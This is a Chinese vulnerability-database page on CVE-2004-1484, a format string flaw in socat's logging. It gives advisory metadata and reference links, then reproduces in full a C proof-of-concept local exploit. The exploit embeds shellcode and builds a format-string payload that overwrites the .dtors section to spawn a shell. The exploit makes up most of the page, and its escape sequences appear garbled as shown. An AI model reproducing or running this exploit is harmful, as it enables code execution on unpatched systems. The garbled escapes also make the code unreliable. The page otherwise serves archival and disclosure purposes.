Socat远程格式字符串漏洞

Socat远程格式字符串漏洞

漏洞ID 1108243 漏洞类型 格式化字符串
发布时间 2004-10-23 更新时间 2005-10-20
图片[1]-Socat远程格式字符串漏洞-安全小百科CVE编号 CVE-2004-1484
图片[2]-Socat远程格式字符串漏洞-安全小百科CNNVD-ID CNNVD-200412-449
漏洞平台 Linux CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/591
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-449
|漏洞详情
socat1.4.0.3版本及之前版本的error.c中的_msg函数在被用作HTTP代理客户端并且带-ly运行时,存在格式字符串漏洞。远程攻击者或本地用户可以借助系统记录消息中的格式字符串说明符执行任意代码。
|漏洞EXP
/* socat_exp.c

   Socat Format String Vulnerability

   socat <= 1.4.0.2 local exploit (Proof of Concept)

   Tested in Slackware 9.0 / 9.1 / 10.0

   by CoKi <[email protected]>
   No System Group - http://www.nosystem.com.ar
   
coki@servidor:~$ make socat_exp
coki@servidor:~$ ./socat_exp

 socat <= 1.4.0.2 local exploit (Proof of Concept)
 by CoKi <[email protected]>

 shellcode address = 0xbfffffb9
 .dtors address    = 0x080740c4

2004/10/19 09:49:46 socat[26197] E unknown syslog facility
"ÄÅÆÇ%142u%30$n%70u%31$n%256u%32$n%192u%33$n"
sh-2.05b$

This exploit does not give a root shell :(   
*/

#include <stdio.h>
#include <string.h>

#define PATH "/usr/local/bin/socat"
#define OBJDUMP "/usr/bin/objdump"
#define GREP "/usr/bin/grep"

unsigned char shellcode[]=  /* aleph1 shellcode.45b */
        "xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0c"
        "xb0x0bx89xf3x8dx4ex08x8dx56x0cxcdx80x31xdb"
        "x89xd8x40xcdx80xe8xdcxffxffxffx2fx62x69x6e"
        "x2fx73x68";

int check(unsigned long addr);

int main(int argc, char *argv[]) {

        int i, dtorsaddr;
        unsigned int bal1, bal2, bal3, bal4;
        char temp[512];
        char buffer[1024];
        int cn1, cn2, cn3, cn4;
        FILE *f;
        char *env[3] = {shellcode, NULL};
        int shaddr = 0xbffffffa - strlen(shellcode) - strlen(PATH);

        sprintf(temp, "%s -s -j .dtors %s | %s ffffffff", OBJDUMP, PATH, GREP);
        f = popen(temp, "r");
        if(fscanf(f, " %08x", &dtorsaddr) != 1) {
                pclose(f);
                printf("Cannot find .dtors addressn");
                exit(1);
        }
        pclose(f);
        dtorsaddr = dtorsaddr + 4;

        printf("n socat <= 1.4.0.2 local exploit (Proof of Concept)n");
        printf(" by CoKi <[email protected]>nn");
        printf(" shellcode address = %.8pn", shaddr);
        printf(" .dtors address    = %.8pnn", dtorsaddr);

        bzero(temp, sizeof(temp));
        bzero(buffer, sizeof(buffer));

        strcat(buffer, "-ly");

        for(i = 0; i < 4; i++) {
                bzero(temp, sizeof(temp));
                sprintf(temp, "%s", &dtorsaddr);
                strncat(buffer, temp, 4);
                dtorsaddr++;
        }

        bal1 = (shaddr & 0xff000000) >> 24;
        bal2 = (shaddr & 0x00ff0000) >> 16;
        bal3 = (shaddr & 0x0000ff00) >>  8;
        bal4 = (shaddr & 0x000000ff);

        cn1 = bal4 - 27 - 16;
        cn1 = check(cn1);
        cn2 = bal3 - bal4;
        cn2 = check(cn2);
        cn3 = bal2 - bal3;
        cn3 = check(cn3);
        cn4 = bal1 - bal2;
        cn4 = check(cn4);

        sprintf(temp, "%%%du%%30$n%%%du%%31$n%%%du%%32$n%%%du%%33$n", cn1, cn2, cn3, cn4);

        strcat(buffer, temp);

        execle(PATH, "socat", buffer, NULL, env);
}

int check(unsigned long addr) {
        char tmp[128];
        snprintf(tmp, sizeof(tmp), "%d", addr);
        if(atoi(tmp) < 1)
                addr = addr + 256;

        return addr;
}

// milw0rm.com [2004-10-23]
|参考资料

来源:XF
名称:socat-format-string(17822)
链接:http://xforce.iss.net/xforce/xfdb/17822
来源:BID
名称:11505
链接:http://www.securityfocus.com/bid/11505
来源:www.nosystem.com.ar
链接:http://www.nosystem.com.ar/advisories/advisory-07.txt
来源:GENTOO
名称:GLSA-200410-26
链接:http://www.gentoo.org/security/en/glsa/glsa-200410-26.xml
来源:SECUNIA
名称:12936
链接:http://secunia.com/advisories/12936/
来源:www.dest-unreach.org
链接:http://www.dest-unreach.org/socat/advisory/socat-adv-1.html

相关推荐: Linux kernel内存信息泄露漏洞

Linux kernel内存信息泄露漏洞 漏洞ID 1204768 漏洞类型 未知 发布时间 2002-01-31 更新时间 2002-01-31 CVE编号 CVE-2002-0046 CNNVD-ID CNNVD-200201-018 漏洞平台 N/A C…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享